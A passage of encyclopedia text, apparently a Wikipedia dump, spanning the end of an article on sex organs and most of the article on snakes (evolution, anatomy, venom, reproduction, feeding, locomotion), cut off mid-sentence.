transfer"; female genitalia are defined as "those parts of the female reproductive tract that make direct contact with male genitalia or male products (sperm, spermatophores) during or immediately after copulation". Evolution It is hard to find a common origin for gonads. However, gonads most likely evolved independently several times. At first, testes and ovaries evolved due to natural selection. A consensus has emerged that sexual selection represents a primary factor for genital evolution. Male genitalia show traits of divergent evolution that are driven by sexual selection. Animals Vertebrates Mammals The visible portion of eutherian mammalian genitals for males consists of the penis and scrotum; for females, it consists of the vulva. In placental mammals, females have two genital orifices, the vaginal and urethral openings, while males have one genital orifice in the penis where urine and semen exit the urethra during urination and ejaculation. Male and female genitals have many nerve endings, resulting in pleasurable and highly sensitive touch. In most human societies, particularly in conservative ones, exposure of the genitals is considered a public indecency. In humans, sex organs/genitalia include: Development In typical prenatal development, sex organs originate from a common primordium during early gestation and differentiate into male or female sexes. The SRY gene, usually located on the Y chromosome and encoding the testis determining factor, determines the direction of the differentiation. The absence of it allows the gonads to continue to develop into ovaries. The development of the internal and external reproductive organs is determined by hormones produced by certain fetal gonads (ovaries or testicles) and the cells' response to them. The initial appearance of the fetal genitalia looks female-like: a pair of urogenital folds with a small protuberance in the middle, and the urethra behind the protuberance. If the fetus has testes and the testes produce testosterone, and if the cells of the genitals respond to the testosterone, the outer urogenital folds swell and fuse in the midline to produce the scrotum; the protuberance grows larger and straighter to form the penis; the inner urogenital swellings grow, wrap around the penis, and fuse in the midline to form the penile raphe. Each organ/body part in one sex has a homologous counterpart. The process of sexual differentiation includes the development of secondary sexual characteristics, such as patterns of pubic and facial hair and female breasts that emerge at puberty. Because of the strong sexual selection affecting the structure and function of genitalia, they form an organ system that evolves rapidly. A great variety of genital form and function may therefore be found among animals. Other animals In many other vertebrates, a single posterior orifice (the cloaca) serves as the only opening for the reproductive, digestive, and urinary tracts (if present) in both sexes. All amphibians, birds, reptiles, some fish, and a few mammals (monotremes, tenrecs, golden moles, and marsupial moles) have this orifice, from which they excrete both urine and feces in addition to serving reproductive functions. Excretory systems with analogous purpose in certain invertebrates are also sometimes referred to as cloacae. Penile and clitoral structures are present in some birds and many reptiles. Sexing teleost fish is determined by the shape of a fleshy tube behind the anus known as genital papilla. Invertebrates Insects The organs concerned with insect mating and the deposition of eggs are known collectively as the external genitalia, although they may be largely internal; their components are very diverse in form. Slugs and snails The reproductive system of gastropods (slugs and snails) varies greatly from one group to another. Planaria Planaria are flat worms widely used in biological research. There are sexual and asexual planaria. Sexual planaria are hermaphrodites, possessing both testicles and ovaries. Each planarian transports its excretion to the other planarian, giving and receiving sperm. Plants In most plant species, an individual has both male and female sex organs (a hermaphrodite). The life cycle of land plants involves alternation of generations between a sporophyte and a haploid gametophyte. The gametophyte produces sperm or egg cells by mitosis. The sporophyte produces spores by meiosis, which in turn develop into gametophytes. Any sex organs that are produced by the plant will develop on the gametophyte. The seed plants, which include conifers and flowering plants, have small gametophytes that develop inside the pollen grains (male) and the ovule (female). Flowers In flowering plants, the flowers contain the sex organs. Sexual reproduction in flowering plants involves the union of the male and female germ cells, sperm and egg cells respectively. Pollen is produced in stamens and is carried to the pistil or carpel, which has the ovule at its base where fertilization can take place. Within each pollen grain is a male gametophyte, which consists of only three cells. In most flowering plants, the female gametophyte within the ovule consists of only seven cells. Thus there are no sex organs as such. Fungi The sex organs in fungi are known as gametangia. In some fungi, the organs are indistinguishable from each other but, in other cases, male and female sex organs are clearly different. Similar gametangia that are similar are known as isogametangia. While male and female gametangia are known as heterogametangia, which occurs in the majority of fungi.
Biology and health sciences
Reproductive system
null
29370
https://en.wikipedia.org/wiki/Snake
Snake
Snakes are elongated limbless reptiles of the suborder Serpentes (). Cladistically squamates, snakes are ectothermic, amniote vertebrates covered in overlapping scales much like other members of the group. Many species of snakes have skulls with several more joints than their lizard ancestors and relatives, enabling them to swallow prey much larger than their heads (cranial kinesis). To accommodate their narrow bodies, snakes' paired organs (such as kidneys) appear one in front of the other instead of side by side, and most have only one functional lung. Some species retain a pelvic girdle with a pair of vestigial claws on either side of the cloaca. Lizards have independently evolved elongate bodies without limbs or with greatly reduced limbs at least twenty-five times via convergent evolution, leading to many lineages of legless lizards. These resemble snakes, but several common groups of legless lizards have eyelids and external ears, which snakes lack, although this rule is not universal (see Amphisbaenia, Dibamidae, and Pygopodidae). Living snakes are found on every continent except Antarctica, and on most smaller land masses; exceptions include some large islands, such as Ireland, Iceland, Greenland, and the islands of New Zealand, as well as many small islands of the Atlantic and central Pacific oceans. Additionally, sea snakes are widespread throughout the Indian and Pacific oceans. Around thirty families are currently recognized, comprising about 520 genera and about 3,900 species. They range in size from the tiny, Barbados threadsnake to the reticulated python of in length. The fossil species Titanoboa cerrejonensis was long. Snakes are thought to have evolved from either burrowing or aquatic lizards, perhaps during the Jurassic period, with the earliest known fossils dating to between 143 and 167 Ma ago. The diversity of modern snakes appeared during the Paleocene epoch ( 66 to 56 Ma ago, after the Cretaceous–Paleogene extinction event). The oldest preserved descriptions of snakes can be found in the Brooklyn Papyrus. Most species of snake are nonvenomous and those that have venom use it primarily to kill and subdue prey rather than for self-defense. Some possess venom that is potent enough to cause painful injury or death to humans. Nonvenomous snakes either swallow prey alive or kill by constriction. Etymology The English word snake comes from Old English , itself from Proto-Germanic (cf. Germanic 'ring snake', Swedish 'grass snake'), from Proto-Indo-European root 'to crawl to creep', which also gave sneak as well as Sanskrit 'snake'. The word ousted adder, as adder went on to narrow in meaning, though in Old English was the general word for snake. The other term, serpent, is from French, ultimately from Indo-European 'to creep', which also gave Ancient Greek () 'I crawl' and Sanskrit ‘snake’. Taxonomy All modern snakes are grouped within the suborder Serpentes in Linnean taxonomy, part of the order Squamata, though their precise placement within squamates remains controversial. The two infraorders of Serpentes are Alethinophidia and Scolecophidia. This separation is based on morphological characteristics and mitochondrial DNA sequence similarity. Alethinophidia is sometimes split into Henophidia and Caenophidia, with the latter consisting of "colubroid" snakes (colubrids, vipers, elapids, hydrophiids, and atractaspids) and acrochordids, while the other alethinophidian families comprise Henophidia. While not extant today, the Madtsoiidae, a family of giant, primitive, python-like snakes, was around until 50,000 years ago in Australia, represented by genera such as Wonambi. Recent molecular studies support the monophyly of the clades of modern snakes, scolecophidians, typhlopids + anomalepidids, alethinophidians, core alethinophidians, uropeltids (Cylindrophis, Anomochilus, uropeltines), macrostomatans, booids, boids, pythonids and caenophidians. Families Legless lizards While snakes are limbless reptiles, evolved from (and grouped with) lizards, there are many other species of lizards that have lost their limbs independently but which superficially look similar to snakes. These include the slowworm, glass snake, and amphisbaenians. Evolution The fossil record of snakes is relatively poor because snake skeletons are typically small and fragile making fossilization uncommon. Fossils readily identifiable as snakes (though often retaining hind limbs) first appear in the fossil record during the Cretaceous period. The earliest known true snake fossils (members of the crown group Serpentes) come from the marine simoliophiids, the oldest of which is the Late Cretaceous (Cenomanian age) Haasiophis terrasanctus from the West Bank, dated to between 112 and 94 million years old. Based on genomic analysis it is certain that snakes descend from lizards. This conclusion is also supported by comparative anatomy, and the fossil record. Pythons and boas—primitive groups among modern snakes—have vestigial hind limbs: tiny, clawed digits known as anal spurs, which are used to grasp during mating. The families Leptotyphlopidae and Typhlopidae also possess remnants of the pelvic girdle, appearing as horny projections when visible. Front limbs are nonexistent in all known snakes. This is caused by the evolution of their Hox genes, controlling limb morphogenesis. The axial skeleton of the snakes' common ancestor, like most other tetrapods, had regional specializations consisting of cervical (neck), thoracic (chest), lumbar (lower back), sacral (pelvic), and caudal (tail) vertebrae. Early in snake evolution, the Hox gene expression in the axial skeleton responsible for the development of the thorax became dominant. As a result, the vertebrae anterior to the hindlimb buds (when present) all have the same thoracic-like identity (except from the atlas, axis, and 1–3 neck vertebrae). In other words, most of a snake's skeleton is an extremely extended thorax. Ribs are found exclusively on the thoracic vertebrae. Neck, lumbar and pelvic vertebrae are very reduced in number (only 2–10 lumbar and pelvic vertebrae are present), while only a short tail remains of the caudal vertebrae. However, the tail is still long enough to be of important use in many species, and is modified in some aquatic and tree-dwelling species. Many modern snake groups originated during the Paleocene, alongside the adaptive radiation of mammals following the extinction of (non-avian) dinosaurs. The expansion of grasslands in North America also led to an explosive radiation among snakes. Previously, snakes were a minor component of the North American fauna, but during the Miocene, the number of species and their prevalence increased dramatically with the first appearances of vipers and elapids in North America and the significant diversification of Colubridae (including the origin of many modern genera such as Nerodia, Lampropeltis, Pituophis, and Pantherophis). Fossils There is fossil evidence to suggest that snakes may have evolved from burrowing lizards during the Cretaceous Period. An early fossil snake relative, Najash rionegrina, was a two-legged burrowing animal with a sacrum, and was fully terrestrial. Najash, which lived 95 million years ago, also had a skull with several features typical for lizards, but had evolved some of the mobile skull joints that define the flexible skull in most modern snakes. The species did not show any resemblances to the modern burrowing blind snakes, which have often been seen as the most primitive group of extant forms. One extant analog of these putative ancestors is the earless monitor Lanthanotus of Borneo (though it is also semiaquatic). Subterranean species evolved bodies streamlined for burrowing, and eventually lost their limbs. According to this hypothesis, features such as the transparent, fused eyelids (brille) and loss of external ears evolved to cope with fossorial difficulties, such as scratched corneas and dirt in the ears. Some primitive snakes are known to have possessed hindlimbs, but their pelvic bones lacked a direct connection to the vertebrae. These include fossil species like Haasiophis, Pachyrhachis and Eupodophis, which are slightly older than Najash. This hypothesis was strengthened in 2015 by the discovery of a 113-million-year-old fossil of a four-legged snake in Brazil that has been named Tetrapodophis amplectus. It has many snake-like features, is adapted for burrowing and its stomach indicates that it was preying on other animals. It is currently uncertain if Tetrapodophis is a snake or another species, in the squamate order, as a snake-like body has independently evolved at least 26 times. Tetrapodophis does not have distinctive snake features in its spine and skull. A study in 2021 places the animal in a group of extinct marine lizards from the Cretaceous period known as dolichosaurs and not directly related to snakes. An alternative hypothesis, based on morphology, suggests the ancestors of snakes were related to mosasaurs—extinct aquatic reptiles from the Cretaceous—forming the clade Pythonomorpha. According to this hypothesis, the fused, transparent eyelids of snakes are thought to have evolved to combat marine conditions (corneal water loss through osmosis), and the external ears were lost through disuse in an aquatic environment. This ultimately led to an animal similar to today's sea snakes. In the Late Cretaceous, snakes recolonized land, and continued to diversify into today's snakes. Fossilized snake remains are known from early Late Cretaceous marine sediments, which is consistent with this hypothesis; particularly so, as they are older than the terrestrial Najash rionegrina. Similar skull structure, reduced or absent limbs, and other anatomical features found in both mosasaurs and snakes lead to a positive cladistical correlation, although some of these features are shared with varanids. Genetic studies in recent years have indicated snakes are not as closely related to monitor lizards as was once believed—and therefore not to mosasaurs, the proposed ancestor in the aquatic scenario of their evolution. However, more evidence links mosasaurs to snakes than to varanids. Fragmented remains found from the Jurassic and Early Cretaceous indicate deeper fossil records for these groups, which may potentially refute either hypothesis. Genetic basis of snake evolution Both fossils and phylogenetic studies demonstrate that snakes evolved from lizards, hence the question became which genetic changes led to limb loss in the snake ancestor. Limb loss is actually very common in extant reptiles and has happened dozens of times within skinks, anguids, and other lizards. In 2016, two studies reported that limb loss in snakes is associated with DNA mutations in the Zone of Polarizing Activity Regulatory Sequence (ZRS), a regulatory region of the sonic hedgehog gene which is critically required for limb development. More advanced snakes have no remnants of limbs, but basal snakes such as pythons and boas do have traces of highly reduced, vestigial hind limbs. Python embryos even have fully developed hind limb buds, but their later development is stopped by the DNA mutations in the ZRS. Distribution There are about 3,900 species of snakes, ranging as far northward as the Arctic Circle in Scandinavia and southward through Australia. Snakes can be found on every continent except Antarctica, as well as in the sea, and as high as in the Himalayan Mountains of Asia. There are numerous islands from which snakes are absent, such as Ireland, Iceland, and New Zealand (although New Zealand's northern waters are infrequently visited by the yellow-bellied sea snake and the banded sea krait). Biology Size The now extinct Titanoboa cerrejonensis was in length. By comparison, the largest extant snakes are the reticulated python, measuring about long, and the green anaconda, which measures about long and is considered the heaviest snake on Earth at . At the other end of the scale, the smallest extant snake is Leptotyphlops carlae, with a length of about . Most snakes are fairly small animals, approximately in length. Perception Some of the most highly developed sensory systems are found in the Crotalidae, or pit vipers—the rattlesnakes and their associates. Pit vipers have all the sense organs of other snakes, as well as additional aids. Pit refers to special infrared-sensitive receptors located on either side of the head, between the nostrils and the eyes. In fact the pit looks like an extra pair of nostrils. All snakes have the ability to sense warmth with touch and heat receptors like other animals ;however, the highly developed pit of the pit vipers is distinctive. Each pit is made of a pit cavity and an inner cavity, the larger one lies just behind and generally below the level of the nostril, and opens forward. Behind this larger cavity is a finer one, barely visible; the cavities are connected internally, separated only by a membrane with nerves that are extraordinarily attuned to detecting temperature changes between. As in the overlapping vision fields of human eyes, the forward-facing pit on either side of the face combined produces a field of vision: a pit viper can distinguish between objects and their environments, as well as accurately judge the distance between objects and itself. The heat sensing ability of a pit viper is so great that it can react to a difference as small as one third of a degree Fahrenheit. Other infrared-sensitive snakes have multiple, smaller labial pits lining the upper lip, just below the nostrils. A snake tracks its prey using smell, collecting airborne particles with its forked tongue, then passing them to the vomeronasal organ or Jacobson's organ in the mouth for examination. The fork in the tongue provides a sort of directional sense of smell and taste simultaneously. The snake's tongue is constantly in motion, sampling particles from the air, ground, and water, analyzing the chemicals found, and determining the presence of prey or predators in the local environment. In water-dwelling snakes, such as the anaconda, the tongue functions efficiently underwater. To pick up particles in the air, the tongue is flicked out. Like a hand getting the weight of something, the fork in the tongue simultaneously provides a sort of directional sense. Snakes have a good sense of smell, but this sense is greatly enhanced in the window of a special organ, the Jacobson's organ. As the tongue is peeled back into the mouth, the forked tip is pressed into the cavities of the Jacobson's organ. Withdrawn to a point, the tongue and the Jacobson's organ work in concert for a taste-smell analysis. The organ itself gives the snake an extrasensory conduit. Quite literally, the snake gets a taste of the neighborhood, capable of slithering in rooms of information like the doors are open. Up until as late as the mid 20th century it was assumed snakes could not hear. In fact snakes have two distinct and wholly independent systems. One of these systems, the somatic, involves transmission of frequencies through ventral skin receptors via the spine. The other system involves vibrations that are transmitted through the snake's attenuated lung to the brain via cranial nerve. A snake's sensitivity to vibration is extremely high. In a quiet room, a snake can hear someone speaking softly. Snake vision varies greatly between species. Some have keen eyesight and others are only able to distinguish light from dark, but the important trend is that a snake's visual perception is adequate enough to track movements. Generally, vision is best in tree-dwelling snakes and weakest in burrowing snakes. Some have binocular vision, where both eyes are capable of focusing on the same point, an example of this being the Asian vine snake. Most snakes focus by moving the lens back and forth in relation to the retina. Diurnal snakes have round pupils and many nocturnal snakes have slit pupils. Most species possess three visual pigments and are probably able to see two primary colors in daylight. The annulated sea snake and the genus Helicops appears to have regained much of their color vision as an adaption to the marine environment they live in. It has been concluded that the last common ancestors of all snakes had UV-sensitive vision, but most snakes that depend on their eyesight to hunt in daylight have evolved lenses that act like sunglasses for filtering out the UV-light, which probably also sharpens their vision by improving the contrast. Skin The skin of a snake is covered in scales. Contrary to the popular notion of snakes being slimy (because of possible confusion of snakes with worms), snakeskin has a smooth, dry texture. Most snakes use specialized belly scales to travel, allowing them to grip surfaces. The body scales may be smooth, keeled, or granular. The eyelids of a snake are transparent "spectacle" scales, also known as brille, which remain permanently closed. For a snake, the skin has been modified to its specialized form of locomotion. Between the inner layer and the outer layer lies the dermis, which contains all the pigments and cells that make up the snake's distinguishing pattern and color. The epidermis, or outer layer, is formed of a substance called keratin, which in mammals is the same basic material that forms nails, claws, and hair. The snake's epidermis of keratin provides it with the armor it needs to protect its internal organs and reduce friction as it passes over rocks. Parts of this keratin armor are rougher than others. The less restricted portion overlaps the front of the scale beneath it. Between them lies a folded back connecting material, also of keratin, also part of the epidermis. This folded back material gives as the snake undulates or eats things bigger than the circumference of its body. The shedding of scales is called ecdysis (or in normal usage, molting or sloughing). Snakes shed the complete outer layer of skin in one piece. Snake scales are not discrete, but extensions of the epidermis—hence they are not shed separately but as a complete outer layer during each molt, akin to a sock being turned inside out. Snakes have a wide diversity of skin coloration patterns which are often related to behavior, such as the tendency to have to flee from predators. Snakes that are at a high risk of predation tend to be plain, or have longitudinal stripes, providing few reference points to predators, thus allowing the snake to escape without being noticed. Plain snakes usually adopt active hunting strategies, as their pattern allows them to send little information to prey about motion. Blotched snakes usually use ambush-based strategies, likely because it helps them blend into an environment with irregularly shaped objects, like sticks or rocks. Spotted patterning can similarly help snakes to blend into their environment. The shape and number of scales on the head, back, and belly are often characteristic and used for taxonomic purposes. Scales are named mainly according to their positions on the body. In "advanced" (Caenophidian) snakes, the broad belly scales and rows of dorsal scales correspond to the vertebrae, allowing these to be counted without the need for dissection. Molting Molting (or "ecdysis") serves a number of purposes - it allows old, worn skin to be replaced and can be synced to mating cycles, as with other animals. Molting occurs periodically throughout the life of a snake. Before each molt, the snake regulates its diet and seeks defensible shelter. Just before shedding, the skin becomes grey and the snake's eyes turn silvery. The inner surface of the old skin liquefies, causing it to separate from the new skin beneath it. After a few days, the eyes clear and the snake reaches out of its old skin, which splits. The snake rubs its body against rough surfaces to aid in the shedding of its old skin. In many cases, the castaway skin peels backward over the body from head to tail in one piece, like taking the dust jacket off a book, revealing a new, larger, brighter layer of skin which has formed underneath. Renewal of the skin by molting supposedly increases the mass of some animals such as insects, but in the case of snakes this has been disputed. Shedding skin can release pheromones and revitalize color and patterns of the skin to increase attraction of mates. Snakes may shed four of five times a year, depending on the weather conditions, food supply, age of the snake, and other factors. It is theoretically possible to identify the snake from its cast skin if it is reasonably intact. Mythological associations of snakes with symbols of healing and medicine, as pictured in the Rod of Asclepius, are derivative of molting. One can attempt to identify the sex of a snake when the species is not distinctly sexually dimorphic by counting scales. The cloaca is probed and measured against the subcaudal scales. Counting scales determines whether a snake is a male or female, as the hemipenes of a male being probed is usually longer. Skeleton The skull of a snake differs from a lizards in several ways. Snakes have more flexible jaws, that is, instead of a juncture at the upper and lower jaw, the snake's jaws are connected by a bone hinge that is called the quadrate bone. Between the two halves of the lower jaw at the chin there is an elastic ligament that allows for a separation. This allows the snake to swallow food larger in proportion to their size and go longer without it, since snakes ingest relatively more in one feeding. Because the sides of the lower jaw can move independently of one another, a snake resting its jaw on a surface has stereo auditory perception, used for detecting the position of prey. The jaw–quadrate–stapes pathway is capable of detecting vibrations on the angstrom scale, despite the absence of an outer ear and the lack of an impedance matching mechanism—provided by the ossicles in other vertebrates. In a snake's skull the brain is well protected. As brain tissues could be damaged through the palate, this protection is especially valuable. The solid and complete neurocranium of snakes is closed at the front. The skeleton of most snakes consists solely of the skull, hyoid, vertebral column, and ribs, though henophidian snakes retain vestiges of the pelvis and rear limbs. The hyoid is a small bone located posterior and ventral to the skull, in the 'neck' region, which serves as an attachment for the muscles of the snake's tongue, as it does in all other tetrapods. The vertebral column consists of between 200 and 400 vertebrae, or sometimes more. The body vertebrae each have two ribs articulating with them. The tail vertebrae are comparatively few in number (often less than 20% of the total) and lack ribs. The vertebrae have projections that allow for strong muscle attachment, enabling locomotion without limbs. Caudal autotomy (self-amputation of the tail), a feature found in some lizards, is absent in most snakes. In the rare cases where it does exist in snakes, caudal autotomy is intervertebral (meaning the separation of adjacent vertebrae), unlike that in lizards, which is intravertebral, i.e. the break happens along a predefined fracture plane present on a vertebra. In some snakes, most notably boas and pythons, there are vestiges of the hindlimbs in the form of a pair of pelvic spurs. These small, claw-like protrusions on each side of the cloaca are the external portion of the vestigial hindlimb skeleton, which includes the remains of an ilium and femur. Snakes are polyphyodonts with teeth that are continuously replaced. Internal organs Snakes and other non-archosaur (crocodilians, dinosaurs + birds and allies) reptiles have a three-chambered heart that controls the circulatory system via the left and right atrium, and one ventricle. Internally, the ventricle is divided into three interconnected cavities: the cavum arteriosum, the cavum pulmonale, and the cavum venosum. The cavum venosum receives deoxygenated blood from the right atrium and the cavum arteriosum receives oxygenated blood from the left atrium. Located beneath the cavum venosum is the cavum pulmonale, which pumps blood to the pulmonary trunk. The snake's heart is encased in a sac, called the pericardium, located at the bifurcation of the bronchi. The heart is able to move around, owing to the lack of a diaphragm; this adjustment protects the heart from potential damage when large ingested prey is passed through the esophagus. The spleen is attached to the gall bladder and pancreas and filters the blood. The thymus, located in fatty tissue above the heart, is responsible for the generation of immune cells in the blood. The cardiovascular system of snakes is unique for the presence of a renal portal system in which the blood from the snake's tail passes through the kidneys before returning to the heart. The circulatory system of a snake is basically like those of any other vertebrae. However, snakes do not regulate internally the temperature of their blood. Called cold-blooded, snakes actually have blood that is responsive to the varying temperature of the immediate environment. Snakes can regulate blood temperature by moving. Too long in direct sunlight, the snakes' blood is heated by beyond tolerance. Left in the ice or snow, the snake may freeze. In temperate zones with pronounced seasonal changes, snakes denning together have adapted to the onslaught of winter. The vestigial left lung is often small or sometimes even absent, as snakes' tubular bodies require all of their organs to be long and thin. In the majority of species, only one lung is functional. This lung contains a vascularized anterior portion and a posterior portion that does not function in gas exchange. This 'saccular lung' is used for hydrostatic purposes to adjust buoyancy in some aquatic snakes and its function remains unknown in terrestrial species. Many organs that are paired, such as kidneys or reproductive organs, are staggered within the body, one located ahead of the other. The snake with its particular arrangement of organs may achieve a greater efficiency. For example, the lung encloses at the part nearest the head and throat an oxygen intake organ, while the other half is used for air reserve. The esophagus-stomach-intestine arrangement is a straight line. It ends where intestinal, urinary, and reproductive tracts open, in a chamber called the cloaca. Snakes have no lymph nodes. Venom Cobras, vipers, and closely related species use venom to immobilize, injure, or kill their prey. The venom is modified saliva, delivered through fangs. The fangs of 'advanced' venomous snakes like viperids and elapids are hollow, allowing venom to be injected more effectively, and the fangs of rear-fanged snakes such as the boomslang simply have a groove on the posterior edge to channel venom into the wound. Snake venoms are often prey-specific, and their role in self-defense is secondary. Venom, like all salivary secretions, is a predigestant that initiates the breakdown of food into soluble compounds, facilitating proper digestion. Even nonvenomous snakebites (like any animal bite) cause tissue damage. Certain birds, mammals, and other snakes (such as kingsnakes) that prey on venomous snakes have developed resistance and even immunity to certain venoms. Venomous snakes include three families of snakes, and do not constitute a formal taxonomic classification group. The colloquial term "poisonous snake" is generally an incorrect label for snakes. A poison is inhaled or ingested, whereas venom produced by snakes is injected into its victim via fangs. There are, however, two exceptions: Rhabdophis sequesters toxins from the toads it eats, then secretes them from nuchal glands to ward off predators; and a small unusual population of garter snakes in the US state of Oregon retains enough toxins in their livers from ingested newts to be effectively poisonous to small local predators (such as crows and foxes). Snake venoms are complex mixtures of proteins, and are stored in venom glands at the back of the head. In all venomous snakes, these glands open through ducts into grooved or hollow teeth in the upper jaw. The proteins can potentially be a mix of neurotoxins (which attack the nervous system), hemotoxins (which attack the circulatory system), cytotoxins (which attack the cells directly), bungarotoxins (related to neurotoxins, but also directly affect muscle tissue), and many other toxins that affect the body in different ways. Almost all snake venom contains hyaluronidase, an enzyme that ensures rapid diffusion of the venom. Venomous snakes that use hemotoxins usually have fangs in the front of their mouths, making it easier for them to inject the venom into their victims. Some snakes that use neurotoxins (such as the mangrove snake) have fangs in the back of their mouths, with the fangs curled backwards. This makes it difficult both for the snake to use its venom and for scientists to milk them. Elapids, however, such as cobras and kraits are proteroglyphous—they possess hollow fangs that cannot be erected toward the front of their mouths, and cannot "stab" like a viper. They must actually bite the victim. It has been suggested that all snakes may be venomous to a certain degree, with harmless snakes having weak venom and no fangs. According to this theory, most snakes that are labelled "nonvenomous" would be considered harmless because they either lack a venom delivery method or are incapable of delivering enough to endanger a human. The theory postulates that snakes may have evolved from a common lizard ancestor that was venomous, and also that venomous lizards like the gila monster, beaded lizard, monitor lizards, and the now-extinct mosasaurs, may have derived from this same common ancestor. They share this "venom clade" with various other saurian species. Venomous snakes are classified in two taxonomic families: Elapids – cobras including king cobras, kraits, mambas, Australian copperheads, sea snakes, and coral snakes. Viperids – vipers, rattlesnakes, copperheads/cottonmouths, and bushmasters. There is a third family containing the opistoglyphous (rear-fanged) snakes (as well as the majority of other snake species): Colubrids – boomslangs, tree snakes, vine snakes, cat snakes, although not all colubrids are venomous. Reproduction Although a wide range of reproductive modes are used by snakes, all employ internal fertilization. This is accomplished by means of paired, forked hemipenes, which are stored, inverted, in the male's tail. The hemipenes are often grooved, hooked, or spined—designed to grip the walls of the female's cloaca. The clitoris of the female snake consists of two structures located between the cloaca and the scent glands. Most species of snakes lay eggs which they abandon shortly after laying. However, a few species (such as the king cobra) construct nests and stay in the vicinity of the hatchlings after incubation. Most pythons coil around their egg-clutches and remain with them until they hatch. A female python will not leave the eggs, except to occasionally bask in the sun or drink water. She will even "shiver" to generate heat to incubate the eggs. Some species of snake are ovoviviparous and retain the eggs within their bodies until they are almost ready to hatch. Several species of snake, such as the boa constrictor and green anaconda, are fully viviparous, nourishing their young through a placenta as well as a yolk sac; this is highly unusual among reptiles, and normally found in requiem sharks or placental mammals. Retention of eggs and live birth are most often associated with colder environments. Sexual selection in snakes is demonstrated by the 3,000 species that each use different tactics in acquiring mates. Ritual combat between males for the females they want to mate with includes topping, a behavior exhibited by most viperids in which one male will twist around the vertically elevated fore body of its opponent and force it downward. It is common for neck-biting to occur while the snakes are entwined. Facultative parthenogenesis Parthenogenesis is a natural form of reproduction in which growth and development of embryos occur without fertilization. Agkistrodon contortrix (copperhead) and Agkistrodon piscivorus (cottonmouth) can reproduce by facultative parthenogenesis, meaning that they are capable of switching from a sexual mode of reproduction to an asexual mode. The most likely type of parthenogenesis to occur is automixis with terminal fusion, a process in which two terminal products from the same meiosis fuse to form a diploid zygote. This process leads to genome-wide homozygosity, expression of deleterious recessive alleles, and often to developmental abnormalities. Both captive-born and wild-born copperheads and cottonmouths appear to be capable of this form of parthenogenesis. Reproduction in squamate reptiles is almost exclusively sexual. Males ordinarily have a ZZ pair of sex-determining chromosomes, and females a ZW pair. However, the Colombian Rainbow boa (Epicrates maurus) can also reproduce by facultative parthenogenesis, resulting in production of WW female progeny. The WW females are likely produced by terminal automixis. Embryonic development Snake embryonic development initially follows similar steps as any vertebrate embryo. The snake embryo begins as a zygote, undergoes rapid cell division, forms a germinal disc, also called a blastodisc, then undergoes gastrulation, neurulation, and organogenesis. Cell division and proliferation continues until an early snake embryo develops and the typical body shape of a snake can be observed. Multiple features differentiate the embryologic development of snakes from other vertebrates, two significant factors being the elongation of the body and the lack of limb development. The elongation in snake body is accompanied by a significant increase in vertebra count (mice have 60 vertebrae, whereas snakes may have over 300). This increase in vertebrae is due to an increase in somites during embryogenesis, leading to an increased number of vertebrae which develop. Somites are formed at the presomitic mesoderm due to a set of oscillatory genes that direct the somitogenesis clock. The snake somitogenesis clock operates at a frequency 4 times that of a mouse (after correction for developmental time), creating more somites, and therefore creating more vertebrae. This difference in clock speed is believed to be caused by differences in Lunatic fringe gene expression, a gene involved in the somitogenesis clock. There is ample literature focusing on the limb development/lack of development in snake embryos and the gene expression associated with the different stages. In basal snakes, such as the python, embryos in early development exhibit a hind limb bud that develops with some cartilage and a cartilaginous pelvic element, however this degenerates before hatching. This presence of vestigial development suggests that some snakes are still undergoing hind limb reduction before they are eliminated. There is no evidence in basal snakes of forelimb rudiments and no examples of snake forelimb bud initiation in embryo, so little is known regarding the loss of this trait. Recent studies suggest that hind limb reduction could be due to mutations in enhancers for the SSH gene, however other studies suggested that mutations within the Hox Genes or their enhancers could contribute to snake limblessness. Since multiple studies have found evidence suggesting different genes played a role in the loss of limbs in snakes, it is likely that multiple gene mutations had an additive effect leading to limb loss in snakes Behavior and life history Winter dormancy In regions where winters are too cold for snakes to tolerate while remaining active, local species will enter a period of brumation. Unlike hibernation, in which the dormant mammals are actually asleep, brumating reptiles are awake but inactive. Individual snakes may brumate in burrows, under rock piles, or inside fallen trees, or large numbers of snakes may clump together in hibernacula. Feeding and diet All snakes are strictly carnivorous, preying on small animals including lizards, frogs, other snakes, small mammals, birds, eggs, fish, snails, worms, and insects. Snakes cannot bite or tear their food to pieces so must swallow their prey whole. The eating habits of a snake are largely influenced by body size; smaller snakes eat smaller prey. Juvenile pythons might start out feeding on lizards or mice and graduate to small deer or antelope as an adult, for example. The snake's jaw is a complex structure. Contrary to the popular belief that snakes can dislocate their jaws, they have an extremely flexible lower jaw, the two halves of which are not rigidly attached, and numerous other joints in the skull, which allow the snake to open its mouth wide enough to swallow prey whole, even if it is larger in diameter than the snake itself. For example, the African egg-eating snake has flexible jaws adapted for eating eggs much larger than the diameter of its head. This snake has no teeth, but does have bony protrusions on the inside edge of its spine, which it uses to break the shell when eating eggs. The majority of snakes eat a variety of prey animals, but there is some specialization in certain species. King cobras and the Australian bandy-bandy consume other snakes. Species of the family Pareidae have more teeth on the right side of their mouths than on the left, as they mostly prey on snails and the shells usually spiral clockwise. Some snakes have a venomous bite, which they use to kill their prey before eating it. Other snakes kill their prey by constriction, while some swallow their prey when it is still alive. After eating, snakes become dormant to allow the process of digestion to take place; this is an intense activity, especially after consumption of large prey. In species that feed only sporadically, the entire intestine enters a reduced state between meals to conserve energy. The digestive system is then 'up-regulated' to full capacity within 48 hours of prey consumption. Being ectothermic ("cold-blooded"), the surrounding temperature plays an important role in the digestion process. The ideal temperature for snakes to digest food is . There is a huge amount of metabolic energy involved in a snake's digestion, for example the surface body temperature of the South American rattlesnake (Crotalus durissus) increases by as much as during the digestive process. If a snake is disturbed after having eaten recently, it will often regurgitate its prey to be able to escape the perceived threat. When undisturbed, the digestive process is highly efficient; the snake's digestive enzymes dissolve and absorb everything but the prey's hair (or feathers) and claws, which are excreted along with waste. Hooding and spitting Hooding (expansion of the neck area) is a visual deterrent, mostly seen in cobras (elapids), and is primarily controlled by rib muscles. Hooding can be accompanied by spitting venom towards the threatening object, and producing a specialized sound; hissing. Studies on captive cobras showed that 13–22% of the body length is raised during hooding. Locomotion The lack of limbs does not impede the movement of snakes. They have developed several different modes of locomotion to deal with particular environments. Unlike the gaits of limbed animals, which form a continuum, each mode of snake locomotion is discrete and distinct from the others; transitions between modes are abrupt. Lateral undulation Lateral undulation is the sole mode of aquatic locomotion, and the most common mode of terrestrial locomotion. In this mode, the body of the snake alternately flexes to the left and right, resulting in a series of rearward-moving "waves". While this movement appears rapid, snakes have rarely been documented moving faster than two body-lengths per second, often much less. This mode of movement has the same net cost of transport (calories burned per meter moved) as running in lizards of the same mass. Terrestrial lateral undulation is the most common mode of terrestrial 